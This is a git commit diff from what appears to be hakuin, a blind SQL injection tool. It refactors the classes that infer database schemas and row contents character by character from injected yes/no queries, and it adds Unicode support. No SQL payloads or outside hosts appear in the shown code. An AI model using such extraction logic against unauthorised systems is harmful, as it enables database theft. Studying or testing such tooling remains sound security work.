mirror of
https://github.com/pruzko/hakuin
synced 2024-10-18 07:38:08 +02:00
major refactoring (DBMS, collectors) & unicode support
This commit is contained in:
parent
042fa5df91
commit
9932d8dacd
3
.gitignore
vendored
3
.gitignore
vendored
@ -162,4 +162,5 @@ cython_debug/
|
||||
#.idea/
|
||||
|
||||
# Hakuin
|
||||
tmp/
|
||||
tmp/
|
||||
demos/
|
||||
|
@ -1,7 +1,6 @@
|
||||
import hakuin
|
||||
import hakuin.search_algorithms as search_alg
|
||||
import hakuin.collectors as collect
|
||||
from hakuin.utils import CHARSET_SCHEMA
|
||||
|
||||
|
||||
|
||||
@ -33,24 +32,23 @@ class Extractor:
|
||||
|
||||
ctx = search_alg.Context(None, None, None, None)
|
||||
|
||||
n_rows = search_alg.IntExponentialSearch(
|
||||
self.requester,
|
||||
self.dbms.count_tables,
|
||||
upper=8
|
||||
n_rows = search_alg.IntExponentialBinarySearch(
|
||||
requester=self.requester,
|
||||
query_cb=self.dbms.TablesQueries.rows_count,
|
||||
upper=8,
|
||||
find_range=True,
|
||||
).run(ctx)
|
||||
|
||||
if strategy == 'binary':
|
||||
return collect.BinaryTextCollector(
|
||||
self.requester,
|
||||
self.dbms.char_tables,
|
||||
charset=CHARSET_SCHEMA,
|
||||
requester=self.requester,
|
||||
queries=self.dbms.TablesQueries,
|
||||
).run(ctx, n_rows)
|
||||
else:
|
||||
return collect.ModelTextCollector(
|
||||
self.requester,
|
||||
self.dbms.char_tables,
|
||||
requester=self.requester,
|
||||
queries=self.dbms.TablesQueries,
|
||||
model=hakuin.get_model_tables(),
|
||||
charset=CHARSET_SCHEMA,
|
||||
).run(ctx, n_rows)
|
||||
|
||||
|
||||
@ -70,24 +68,23 @@ class Extractor:
|
||||
|
||||
ctx = search_alg.Context(table, None, None, None)
|
||||
|
||||
n_rows = search_alg.IntExponentialSearch(
|
||||
self.requester,
|
||||
self.dbms.count_columns,
|
||||
upper=8
|
||||
n_rows = search_alg.IntExponentialBinarySearch(
|
||||
requester=self.requester,
|
||||
query_cb=self.dbms.ColumnsQueries.rows_count,
|
||||
upper=8,
|
||||
find_range=True,
|
||||
).run(ctx)
|
||||
|
||||
if strategy == 'binary':
|
||||
return collect.BinaryTextCollector(
|
||||
self.requester,
|
||||
self.dbms.char_columns,
|
||||
charset=CHARSET_SCHEMA,
|
||||
requester=self.requester,
|
||||
queries=self.dbms.ColumnsQueries,
|
||||
).run(ctx, n_rows)
|
||||
else:
|
||||
return collect.ModelTextCollector(
|
||||
self.requester,
|
||||
self.dbms.char_columns,
|
||||
requester=self.requester,
|
||||
queries=self.dbms.ColumnsQueries,
|
||||
model=hakuin.get_model_columns(),
|
||||
charset=CHARSET_SCHEMA,
|
||||
).run(ctx, n_rows)
|
||||
|
||||
|
||||
@ -104,15 +101,15 @@ class Extractor:
|
||||
ctx = search_alg.Context(table, column, None, None)
|
||||
|
||||
d_type = search_alg.BinarySearch(
|
||||
self.requester,
|
||||
self.dbms.meta_type,
|
||||
requester=self.requester,
|
||||
query_cb=self.dbms.MetaQueries.column_data_type,
|
||||
values=self.dbms.DATA_TYPES,
|
||||
).run(ctx)
|
||||
|
||||
return {
|
||||
'type': d_type,
|
||||
'nullable': self.requester.request(ctx, self.dbms.meta_is_nullable(ctx)),
|
||||
'pk': self.requester.request(ctx, self.dbms.meta_is_pk(ctx)),
|
||||
'nullable': self.requester.request(ctx, self.dbms.MetaQueries.column_is_nullable(ctx)),
|
||||
'pk': self.requester.request(ctx, self.dbms.MetaQueries.column_is_pk(ctx)),
|
||||
}
|
||||
|
||||
|
||||
@ -140,7 +137,7 @@ class Extractor:
|
||||
return schema
|
||||
|
||||
|
||||
def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows=None, n_rows_guess=128):
|
||||
def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128):
|
||||
'''Extracts text column.
|
||||
|
||||
Params:
|
||||
@ -152,7 +149,6 @@ class Extractor:
|
||||
'dynamic' for dynamically choosing the best search strategy and
|
||||
opportunistically guessing strings
|
||||
charset (list|None): list of possible characters
|
||||
n_rows (int|None): number of rows
|
||||
n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set
|
||||
|
||||
Returns:
|
||||
@ -162,32 +158,30 @@ class Extractor:
|
||||
assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
|
||||
|
||||
ctx = search_alg.Context(table, column, None, None)
|
||||
|
||||
if n_rows is None:
|
||||
n_rows = search_alg.IntExponentialSearch(
|
||||
self.requester,
|
||||
self.dbms.count_rows,
|
||||
upper=n_rows_guess
|
||||
).run(ctx)
|
||||
n_rows = search_alg.IntExponentialBinarySearch(
|
||||
requester=self.requester,
|
||||
query_cb=self.dbms.RowsQueries.rows_count,
|
||||
upper=n_rows_guess,
|
||||
find_range=True,
|
||||
).run(ctx)
|
||||
|
||||
if strategy == 'binary':
|
||||
return collect.BinaryTextCollector(
|
||||
self.requester,
|
||||
self.dbms.char_rows,
|
||||
requester=self.requester,
|
||||
queries=self.dbms.RowsQueries,
|
||||
charset=charset,
|
||||
).run(ctx, n_rows)
|
||||
elif strategy in ['unigram', 'fivegram']:
|
||||
ngram = 1 if strategy == 'unigram' else 5
|
||||
return collect.AdaptiveTextCollector(
|
||||
self.requester,
|
||||
self.dbms.char_rows,
|
||||
requester=self.requester,
|
||||
queries=self.dbms.RowsQueries,
|
||||
model=hakuin.Model(ngram),
|
||||
charset=charset,
|
||||
).run(ctx, n_rows)
|
||||
else:
|
||||
return collect.DynamicTextCollector(
|
||||
self.requester,
|
||||
self.dbms.char_rows,
|
||||
self.dbms.string_rows,
|
||||
requester=self.requester,
|
||||
queries=self.dbms.RowsQueries,
|
||||
charset=charset,
|
||||
).run(ctx, n_rows)
|
||||
|
@ -26,8 +26,9 @@ class Model:
|
||||
|
||||
@property
|
||||
def order(self):
|
||||
assert self.model
|
||||
return self.model.order
|
||||
if self.model:
|
||||
return self.model.order
|
||||
return None
|
||||
|
||||
|
||||
def load(self, file):
|
||||
@ -49,7 +50,7 @@ class Model:
|
||||
Returns:
|
||||
dict: likelihood distribution
|
||||
'''
|
||||
context = context[-(self.order - 1):]
|
||||
context = [] if self.order == 1 else context[-(self.order - 1):]
|
||||
|
||||
while context:
|
||||
scores = self._scores(context)
|
||||
|
@ -3,284 +3,544 @@ from abc import ABCMeta, abstractmethod
|
||||
from collections import Counter
|
||||
|
||||
import hakuin
|
||||
from hakuin.utils import tokenize, CHARSET_ASCII, EOS
|
||||
from hakuin.utils import tokenize, CHARSET_ASCII, EOS, ASCII_MAX, UNICODE_MAX
|
||||
from hakuin.utils.huffman import make_tree
|
||||
from hakuin.search_algorithms import Context, BinarySearch, TreeSearch
|
||||
from hakuin.search_algorithms import Context, BinarySearch, TreeSearch, IntExponentialBinarySearch
|
||||
|
||||
|
||||
|
||||
class Collector(metaclass=ABCMeta):
|
||||
'''Abstract class for collectors. Collectors repeatidly run
|
||||
search algorithms to infer column rows.
|
||||
search algorithms to extract column rows.
|
||||
'''
|
||||
def __init__(self, requester, query_cb):
|
||||
def __init__(self, requester, queries):
|
||||
'''Constructor.
|
||||
|
||||
Params:
|
||||
requester (Requester): Requester instance
|
||||
query_cb (function): query construction function
|
||||
queries (UniformQueries): injection queries
|
||||
'''
|
||||
self.requester = requester
|
||||
self.query_cb = query_cb
|
||||
self.queries = queries
|
||||
|
||||
|
||||
def run(self, ctx, n_rows):
|
||||
'''Run collection.
|
||||
def run(self, ctx, n_rows, *args, **kwargs):
|
||||
'''Collects the whole column.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
ctx (Context): extraction context
|
||||
n_rows (int): number of rows in column
|
||||
|
||||
Returns:
|
||||
list: column rows
|
||||
'''
|
||||
logging.info(f'Inferring "{ctx.table}.{ctx.column}"...')
|
||||
logging.info(f'Inferring "{ctx.table}.{ctx.column}"')
|
||||
|
||||
data = []
|
||||
for row in range(n_rows):
|
||||
ctx = Context(ctx.table, ctx.column, row, None)
|
||||
res = self._collect_row(ctx)
|
||||
res = self.collect_row(ctx, *args, **kwargs)
|
||||
data.append(res)
|
||||
|
||||
logging.info(f'({row + 1}/{n_rows}) inferred: {res}')
|
||||
logging.info(f'({row + 1}/{n_rows}) "{ctx.table}.{ctx.column}": {res}')
|
||||
|
||||
return data
|
||||
|
||||
|
||||
@abstractmethod
|
||||
def _collect_row(self, ctx):
|
||||
def collect_row(self, ctx, *args, **kwargs):
|
||||
'''Collects a row.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
|
||||
Returns:
|
||||
value: single row
|
||||
'''
|
||||
raise NotImplementedError()
|
||||
|
||||
|
||||
|
||||
class TextCollector(Collector):
|
||||
'''Collector for text columns.'''
|
||||
def _collect_row(self, ctx):
|
||||
def __init__(self, requester, queries, charset=None):
|
||||
'''Constructor.
|
||||
|
||||
Params:
|
||||
requester (Requester): Requester instance
|
||||
queries (UniformQueries): injection queries
|
||||
charset (list|None): list of possible characters, None for default ASCII
|
||||
'''
|
||||
super().__init__(requester, queries)
|
||||
self.charset = charset if charset is not None else CHARSET_ASCII
|
||||
if EOS not in self.charset:
|
||||
self.charset.append(EOS)
|
||||
|
||||
|
||||
def run(self, ctx, n_rows):
|
||||
'''Collects the whole column.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
n_rows (int): number of rows in column
|
||||
|
||||
Returns:
|
||||
list: column rows
|
||||
'''
|
||||
rows_are_ascii = self.check_rows_are_ascii(ctx)
|
||||
return super().run(ctx, n_rows, rows_are_ascii)
|
||||
|
||||
|
||||
def collect_row(self, ctx, rows_are_ascii):
|
||||
'''Collects a row.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
rows_are_ascii (bool): ASCII flag for all rows in column
|
||||
|
||||
Returns:
|
||||
string: single row
|
||||
'''
|
||||
row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx)
|
||||
|
||||
ctx.s = ''
|
||||
while True:
|
||||
c = self._collect_char(ctx)
|
||||
c = self.collect_char(ctx, row_is_ascii)
|
||||
if c == EOS:
|
||||
return ctx.s
|
||||
ctx.s += c
|
||||
|
||||
|
||||
@abstractmethod
|
||||
def _collect_char(self, ctx):
|
||||
def collect_char(self, ctx, row_is_ascii):
|
||||
'''Collects a character.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
row_is_ascii (bool): row ASCII flag
|
||||
|
||||
Returns:
|
||||
string: single character
|
||||
'''
|
||||
raise NotImplementedError()
|
||||
|
||||
|
||||
def check_rows_are_ascii(self, ctx):
|
||||
'''Finds out whether all rows in column are ASCII.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
|
||||
Returns:
|
||||
bool: ASCII flag
|
||||
'''
|
||||
query = self.queries.rows_are_ascii(ctx)
|
||||
return self.requester.request(ctx, query)
|
||||
|
||||
|
||||
def check_row_is_ascii(self, ctx):
|
||||
'''Finds out whether current row is ASCII.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
|
||||
Returns:
|
||||
bool: ASCII flag
|
||||
'''
|
||||
query = self.queries.row_is_ascii(ctx)
|
||||
return self.requester.request(ctx, query)
|
||||
|
||||
|
||||
def check_char_is_ascii(self, ctx):
|
||||
'''Finds out whether current character is ASCII.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
|
||||
Returns:
|
||||
bool: ASCII flag
|
||||
'''
|
||||
query = self.queries.char_is_ascii(ctx)
|
||||
return self.requester.request(ctx, query)
|
||||
|
||||
|
||||
|
||||
class BinaryTextCollector(TextCollector):
|
||||
'''Binary search text collector'''
|
||||
def __init__(self, requester, query_cb, charset=None):
|
||||
'''Constructor.
|
||||
def collect_char(self, ctx, row_is_ascii):
|
||||
'''Collects a character.
|
||||
|
||||
Params:
|
||||
requester (Requester): Requester instance
|
||||
query_cb (function): query construction function
|
||||
charset (list|None): list of possible characters
|
||||
ctx (Context): extraction context
|
||||
row_is_ascii (bool): row ASCII flag
|
||||
|
||||
Returns:
|
||||
list: column rows
|
||||
string: single character
|
||||
'''
|
||||
super().__init__(requester, query_cb)
|
||||
self.charset = charset if charset else CHARSET_ASCII
|
||||
return self._collect_or_emulate_char(ctx, row_is_ascii)[0]
|
||||
|
||||
|
||||
def _collect_char(self, ctx):
|
||||
return BinarySearch(
|
||||
self.requester,
|
||||
self.query_cb,
|
||||
values=self.charset,
|
||||
).run(ctx)
|
||||
def emulate_char(self, ctx, row_is_ascii, correct):
|
||||
'''Emulates character collection without sending requests.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
row_is_ascii (bool): row ASCII flag
|
||||
correct (str): correct character
|
||||
|
||||
Returns:
|
||||
int: number of requests necessary
|
||||
'''
|
||||
return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1]
|
||||
|
||||
|
||||
def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None):
|
||||
total_queries = 0
|
||||
|
||||
# custom charset or ASCII
|
||||
if self.charset is not CHARSET_ASCII or row_is_ascii or self._check_or_emulate_char_is_ascii(ctx, correct):
|
||||
search_alg = BinarySearch(
|
||||
requester=self.requester,
|
||||
query_cb=self.queries.char,
|
||||
values=self.charset,
|
||||
correct=correct,
|
||||
)
|
||||
res = search_alg.run(ctx)
|
||||
total_queries += search_alg.n_queries
|
||||
|
||||
if res is not None:
|
||||
return res, total_queries
|
||||
|
||||
# Unicode
|
||||
correct_ord = ord(correct) if correct is not None else correct
|
||||
search_alg = IntExponentialBinarySearch(
|
||||
requester=self.requester,
|
||||
query_cb=self.queries.char_unicode,
|
||||
lower=ASCII_MAX + 1,
|
||||
upper=UNICODE_MAX + 1,
|
||||
find_range=False,
|
||||
correct=correct_ord,
|
||||
)
|
||||
res = search_alg.run(ctx)
|
||||
total_queries += search_alg.n_queries
|
||||
|
||||
return chr(res), total_queries
|
||||
|
||||
|
||||
def _check_or_emulate_char_is_ascii(self, ctx, correct):
|
||||
if correct is None:
|
||||
return self.check_char_is_ascii(ctx)
|
||||
return correct.isascii()
|
||||
|
||||
|
||||
|
||||
class ModelTextCollector(TextCollector):
|
||||
'''Language model-based text collector.'''
|
||||
def __init__(self, requester, query_cb, model, charset=None):
|
||||
def __init__(self, requester, queries, model, charset=None):
|
||||
'''Constructor.
|
||||
|
||||
Params:
|
||||
requester (Requester): Requester instance
|
||||
query_cb (function): query construction function
|
||||
queries (UniformQueries): injection queries
|
||||
model (Model): language model
|
||||
charset (list|None): list of possible characters
|
||||
|
||||
Returns:
|
||||
list: column rows
|
||||
'''
|
||||
super().__init__(requester, query_cb)
|
||||
super().__init__(requester, queries, charset)
|
||||
self.model = model
|
||||
self.charset = charset if charset else CHARSET_ASCII
|
||||
self.binary_collector = BinaryTextCollector(
|
||||
requester=self.requester,
|
||||
queries=self.queries,
|
||||
charset=self.charset,
|
||||
)
|
||||
|
||||
|
||||
def _collect_char(self, ctx):
|
||||
def collect_char(self, ctx, row_is_ascii):
|
||||
'''Collects a character.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
row_is_ascii (bool): row ASCII flag
|
||||
|
||||
Returns:
|
||||
string: single character
|
||||
'''
|
||||
return self._collect_or_emulate_char(ctx, row_is_ascii)[0]
|
||||
|
||||
|
||||
def emulate_char(self, ctx, row_is_ascii, correct):
|
||||
'''Emulates character collection without sending requests.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
row_is_ascii (bool): row ASCII flag
|
||||
correct (str): correct character
|
||||
|
||||
Returns:
|
||||
int: number of requests necessary
|
||||
'''
|
||||
return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1]
|
||||
|
||||
|
||||
def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None):
|
||||
n_queries_model = 0
|
||||
|
||||
model_ctx = tokenize(ctx.s, add_eos=False)
|
||||
scores = self.model.scores(context=model_ctx)
|
||||
|
||||
c = TreeSearch(
|
||||
self.requester,
|
||||
self.query_cb,
|
||||
search_alg = TreeSearch(
|
||||
requester=self.requester,
|
||||
query_cb=self.queries.char,
|
||||
tree=make_tree(scores),
|
||||
).run(ctx)
|
||||
correct=correct,
|
||||
)
|
||||
res = search_alg.run(ctx)
|
||||
n_queries_model = search_alg.n_queries
|
||||
|
||||
if c is not None:
|
||||
return c
|
||||
if res is not None:
|
||||
return res, n_queries_model
|
||||
|
||||
charset = list(set(self.charset).difference(set(scores)))
|
||||
return BinarySearch(
|
||||
self.requester,
|
||||
self.query_cb,
|
||||
values=self.charset,
|
||||
).run(ctx)
|
||||
res, n_queries_binary = self.binary_collector._collect_or_emulate_char(ctx, row_is_ascii, correct)
|
||||
return res, n_queries_model + n_queries_binary
|
||||
|
||||
|
||||
|
||||
class AdaptiveTextCollector(ModelTextCollector):
|
||||
'''Same as ModelTextCollector but adapts the model.'''
|
||||
def _collect_char(self, ctx):
|
||||
c = super()._collect_char(ctx)
|
||||
def collect_char(self, ctx):
|
||||
c = super().collect_char(ctx, correct)
|
||||
self.model.fit_correct_char(c, partial_str=ctx.s)
|
||||
return c
|
||||
|
||||
|
||||
|
||||
class DynamicTextStats:
|
||||
'''Helper class of DynamicTextCollector to keep track of statistical information.'''
|
||||
def __init__(self):
|
||||
self.str_len_mean = 0.0
|
||||
self.n_strings = 0
|
||||
self._rpc = {
|
||||
'binary': {'mean': 0.0, 'hist': []},
|
||||
'unigram': {'mean': 0.0, 'hist': []},
|
||||
'fivegram': {'mean': 0.0, 'hist': []},
|
||||
}
|
||||
|
||||
|
||||
def update_str(self, s):
|
||||
self.n_strings += 1
|
||||
self.str_len_mean = (self.str_len_mean * (self.n_strings - 1) + len(s)) / self.n_strings
|
||||
|
||||
|
||||
def update_rpc(self, strategy, n_queries):
|
||||
rpc = self._rpc[strategy]
|
||||
rpc['hist'].append(n_queries)
|
||||
rpc['hist'] = rpc['hist'][-100:]
|
||||
rpc['mean'] = sum(rpc['hist']) / len(rpc['hist'])
|
||||
|
||||
|
||||
def rpc(self, strategy):
|
||||
return self._rpc[strategy]['mean']
|
||||
|
||||
|
||||
def best_strategy(self):
|
||||
return min(self._rpc, key=lambda strategy: self.rpc(strategy))
|
||||
|
||||
|
||||
|
||||
class DynamicTextCollector(TextCollector):
|
||||
'''Dynamic text collector. The collector keeps statistical information (RPC)
|
||||
for several strategies (binary search, unigram, and five-gram) and dynamically
|
||||
chooses the best one. In addition, it uses the statistical information to
|
||||
identify when guessing whole strings is likely to succeed and then uses
|
||||
previously inferred strings to make the guesses.
|
||||
'''
|
||||
def __init__(self, requester, queries, charset=None):
|
||||
'''Constructor.
|
||||
|
||||
Attributes:
|
||||
GUESS_TH (float): success probability threshold necessary to make guesses
|
||||
GUESS_SCORE_TH (float): minimal necessary probability to be included in guess tree
|
||||
Params:
|
||||
requester (Requester): Requester instance
|
||||
queries (UniformQueries): injection queries
|
||||
charset (list|None): list of possible characters
|
||||
|
||||
Other Attributes:
|
||||
model_unigram (Model): adaptive unigram model
|
||||
model_fivegram (Model): adaptive five-gram model
|
||||
guess_collector (StringGuessCollector): collector for guessing
|
||||
'''
|
||||
super().__init__(requester, queries, charset)
|
||||
self.binary_collector = BinaryTextCollector(
|
||||
requester=self.requester,
|
||||
queries=self.queries,
|
||||
charset=self.charset,
|
||||
)
|
||||
self.unigram_collector = ModelTextCollector(
|
||||
requester=self.requester,
|
||||
queries=self.queries,
|
||||
model=hakuin.Model(1),
|
||||
charset=self.charset,
|
||||
)
|
||||
self.fivegram_collector = ModelTextCollector(
|
||||
requester=self.requester,
|
||||
queries=self.queries,
|
||||
model=hakuin.Model(5),
|
||||
charset=self.charset,
|
||||
)
|
||||
self.guess_collector = StringGuessingCollector(
|
||||
requester=self.requester,
|
||||
queries=self.queries,
|
||||
)
|
||||
self.stats = DynamicTextStats()
|
||||
|
||||
|
||||
def collect_row(self, ctx, rows_are_ascii):
|
||||
row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx)
|
||||
|
||||
s = self._collect_string(ctx, row_is_ascii)
|
||||
self.guess_collector.model.fit_single(s, context=[])
|
||||
self.stats.update_str(s)
|
||||
|
||||
return s
|
||||
|
||||
|
||||
def _collect_string(self, ctx, row_is_ascii):
|
||||
'''Tries to guess strings or extracts them on per-character basis if guessing fails'''
|
||||
exp_c = self.stats.str_len_mean * self.stats.rpc(self.stats.best_strategy())
|
||||
correct_str = self.guess_collector.collect_row(ctx, exp_c)
|
||||
|
||||
if correct_str is not None:
|
||||
self._update_stats_str(ctx, row_is_ascii, correct_str)
|
||||
self.unigram_collector.model.fit_data([correct_str])
|
||||
self.fivegram_collector.model.fit_data([correct_str])
|
||||
return correct_str
|
||||
|
||||
return self._collect_string_per_char(ctx, row_is_ascii)
|
||||
|
||||
|
||||
def _collect_string_per_char(self, ctx, row_is_ascii):
|
||||
ctx.s = ''
|
||||
while True:
|
||||
c = self.collect_char(ctx, row_is_ascii)
|
||||
self._update_stats(ctx, row_is_ascii, c)
|
||||
self.unigram_collector.model.fit_correct_char(c, partial_str=ctx.s)
|
||||
self.fivegram_collector.model.fit_correct_char(c, partial_str=ctx.s)
|
||||
|
||||
if c == EOS:
|
||||
return ctx.s
|
||||
ctx.s += c
|
||||
|
||||
return ctx.s
|
||||
|
||||
|
||||
def collect_char(self, ctx, row_is_ascii):
|
||||
'''Chooses the best strategy and uses it to infer a character.'''
|
||||
best = self.stats.best_strategy()
|
||||
# print(f'b: {self.stats.rpc("binary")}, u: {self.stats.rpc("unigram")}, f: {self.stats.rpc("fivegram")}')
|
||||
if best == 'binary':
|
||||
return self.binary_collector.collect_char(ctx, row_is_ascii)
|
||||
elif best == 'unigram':
|
||||
return self.unigram_collector.collect_char(ctx, row_is_ascii)
|
||||
else:
|
||||
return self.fivegram_collector.collect_char(ctx, row_is_ascii)
|
||||
|
||||
|
||||
def _update_stats(self, ctx, row_is_ascii, correct):
|
||||
'''Emulates all strategies without sending requests and updates the statistical information.'''
|
||||
collectors = (
|
||||
('binary', self.binary_collector),
|
||||
('unigram', self.unigram_collector),
|
||||
('fivegram', self.fivegram_collector),
|
||||
)
|
||||
|
||||
for strategy, collector in collectors:
|
||||
n_queries = collector.emulate_char(ctx, row_is_ascii, correct)
|
||||
self.stats.update_rpc(strategy, n_queries)
|
||||
|
||||
|
||||
def _update_stats_str(self, ctx, row_is_ascii, correct_str):
|
||||
'''Like _update_stats but for whole strings.'''
|
||||
ctx.s = ''
|
||||
for c in correct_str:
|
||||
self._update_stats(ctx, row_is_ascii, c)
|
||||
ctx.s += c
|
||||
|
||||
|
||||
|
||||
class StringGuessingCollector(Collector):
|
||||
'''String guessing collector. The collector keeps track of previously extracted
|
||||
strings and opportunistically tries to guess new strings.
|
||||
'''
|
||||
GUESS_TH = 0.5
|
||||
GUESS_SCORE_TH = 0.01
|
||||
|
||||
|
||||
def __init__(self, requester, query_char_cb, query_string_cb, charset=None):
|
||||
def __init__(self, requester, queries):
|
||||
'''Constructor.
|
||||
|
||||
Params:
|
||||
requester (Requester): Requester instance
|
||||
query_char_cb (function): query construction function for searching characters
|
||||
query_string_cb (function): query construction function for searching strings
|
||||
charset (list|None): list of possible characters
|
||||
queries (UniformQueries): injection queries
|
||||
|
||||
Other Attributes:
|
||||
model_guess: adaptive string-based model for guessing
|
||||
model_unigram: adaptive unigram model
|
||||
model_fivegram: adaptive five-gram model
|
||||
GUESS_TH (float): minimal threshold necessary to start guessing
|
||||
GUESS_SCORE_TH (float): minimal threshold for strings to be eligible for guessing
|
||||
model (Model): adaptive string-based model for guessing
|
||||
'''
|
||||
self.requester = requester
|
||||
self.query_char_cb = query_char_cb
|
||||
self.query_string_cb = query_string_cb
|
||||
self.charset = charset if charset else CHARSET_ASCII
|
||||
self.model_guess = hakuin.Model(1)
|
||||
self.model_unigram = hakuin.Model(1)
|
||||
self.model_fivegram = hakuin.Model(5)
|
||||
self._stats = {
|
||||
'rpc': {
|
||||
'binary': {'avg': 0.0, 'hist': []},
|
||||
'unigram': {'avg': 0.0, 'hist': []},
|
||||
'fivegram': {'avg': 0.0, 'hist': []},
|
||||
},
|
||||
'avg_len': 0.0,
|
||||
'n_strings': 0,
|
||||
}
|
||||
super().__init__(requester, queries)
|
||||
self.model = hakuin.Model(1)
|
||||
|
||||
|
||||
def _collect_row(self, ctx):
|
||||
s = self._collect_string(ctx)
|
||||
self.model_guess.fit_single(s, context=[])
|
||||
def collect_row(self, ctx, exp_alt=None):
|
||||
'''Tries to construct a guessing Huffman tree and searches it in case of success.
|
||||
|
||||
self._stats['n_strings'] += 1
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
exp_alt (float|None): expectation for alternative extraction method or None if it does not exist
|
||||
|
||||
total = self._stats['avg_len'] * (self._stats['n_strings'] - 1) + len(s)
|
||||
self._stats['avg_len'] = total / self._stats['n_strings']
|
||||
return s
|
||||
|
||||
|
||||
def _collect_string(self, ctx):
|
||||
'''Identifies if guessings strings is likely to succeed and if yes, it makes guesses.
|
||||
If guessing does not take place or fails, it proceeds with per-character inference.
|
||||
Returns:
|
||||
string|None: guessed string or None if skipped or failed
|
||||
'''
|
||||
correct_str = self._try_guessing(ctx)
|
||||
|
||||
if correct_str is not None:
|
||||
self._update_stats_str(ctx, correct_str)
|
||||
self.model_unigram.fit_data([correct_str])
|
||||
self.model_fivegram.fit_data([correct_str])
|
||||
return correct_str
|
||||
|
||||
ctx.s = ''
|
||||
while True:
|
||||
c = self._collect_char(ctx)
|
||||
|
||||
self._update_stats(ctx, c)
|
||||
self.model_unigram.fit_correct_char(c, partial_str=ctx.s)
|
||||
self.model_fivegram.fit_correct_char(c, partial_str=ctx.s)
|
||||
|
||||
if c == EOS:
|
||||
return ctx.s
|
||||
|
||||
ctx.s += c
|
||||
|
||||
|
||||
def _collect_char(self, ctx):
|
||||
'''Chooses the best strategy and uses it to infer a character.'''
|
||||
searched_space = set()
|
||||
c = self._get_strategy(ctx, searched_space, self._best_strategy()).run(ctx)
|
||||
if c is None:
|
||||
c = self._get_strategy(ctx, searched_space, 'binary').run(ctx)
|
||||
return c
|
||||
|
||||
|
||||
def _try_guessing(self, ctx):
|
||||
'''Tries to construct a guessing Huffman tree and searches it in case of success.'''
|
||||
tree = self._get_guess_tree(ctx)
|
||||
exp_alt = exp_alt if exp_alt is not None else float('inf')
|
||||
tree = self._get_guess_tree(ctx, exp_alt)
|
||||
return TreeSearch(
|
||||
self.requester,
|
||||
self.query_string_cb,
|
||||
requester=self.requester,
|
||||
query_cb=self.queries.string,
|
||||
tree=tree,
|
||||
).run(ctx)
|
||||
|
||||
|
||||
def _get_guess_tree(self, ctx):
|
||||
def _get_guess_tree(self, ctx, exp_alt):
|
||||
'''Identifies, whether string guessing is likely to succeed and if so,
|
||||
it constructs a Huffman tree from previously inferred strings.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
exp_alt (float): expectation for alternative extraction method
|
||||
|
||||
Returns:
|
||||
utils.huffman.Node|None: Huffman tree constructed from previously inferred
|
||||
strings that are likely to succeed or None if no such strings were found
|
||||
utils.huffman.Node|None: Huffman tree constructed from previously inferred strings that are
|
||||
likely to succeed or None if no such strings were found
|
||||
'''
|
||||
|
||||
# Expectation for per-character inference:
|
||||
# exp_c = avg_len * best_strategy_rpc
|
||||
exp_c = self._stats['avg_len'] * self._stats['rpc'][self._best_strategy()]['avg']
|
||||
|
||||
# Iteratively compute the best expectation "best_exp_g" by progressively inserting guess
|
||||
# strings into a candidate guess set "guesses" and computing their expectation "exp_g".
|
||||
# The iteration stops when the minimal "exp_g" is found.
|
||||
# exp(G) = p(s in G) * exp_huff(G) + (1 - p(c in G)) * (exp_huff(G) + exp_c)
|
||||
# exp(G) = p(s in G) * exp_huff(G) + (1 - p(c in G)) * (exp_huff(G) + exp_alt)
|
||||
guesses = {}
|
||||
prob_g = 0.0
|
||||
best_prob_g = 0.0
|
||||
best_exp_g = float('inf')
|
||||
best_tree = None
|
||||
|
||||
scores = self.model_guess.scores(context=[])
|
||||
scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model_guess.count(k, []) > 1}
|
||||
scores = self.model.scores(context=[])
|
||||
scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model.count(k, []) > 1}
|
||||
for guess, score in sorted(scores.items(), key=lambda x: x[1], reverse=True):
|
||||
guesses[guess] = score
|
||||
|
||||
tree = make_tree(guesses)
|
||||
tree_cost = tree.search_cost()
|
||||
prob_g += score
|
||||
exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_c)
|
||||
exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_alt)
|
||||
|
||||
if exp_g > best_exp_g:
|
||||
break
|
||||
@ -289,83 +549,7 @@ class DynamicTextCollector(TextCollector):
|
||||
best_exp_g = exp_g
|
||||
best_tree = tree
|
||||
|
||||
if best_exp_g > exp_c or best_prob_g < self.GUESS_TH:
|
||||
return None
|
||||
if best_exp_g <= exp_alt and best_prob_g > self.GUESS_TH:
|
||||
return best_tree
|
||||
|
||||
return best_tree
|
||||
|
||||
|
||||
def _best_strategy(self):
|
||||
'''Returns the name of the best strategy.'''
|
||||
return min(self._stats['rpc'], key=lambda strategy: self._stats['rpc'][strategy]['avg'])
|
||||
|
||||
|
||||
def _update_stats(self, ctx, correct):
|
||||
'''Emulates all strategies without sending any requests and updates the
|
||||
statistical information.
|
||||
'''
|
||||
for strategy in self._stats['rpc']:
|
||||
searched_space = set()
|
||||
search_alg = self._get_strategy(ctx, searched_space, strategy, correct)
|
||||
res = search_alg.run(ctx)
|
||||
n_queries = search_alg.n_queries
|
||||
if res is None:
|
||||
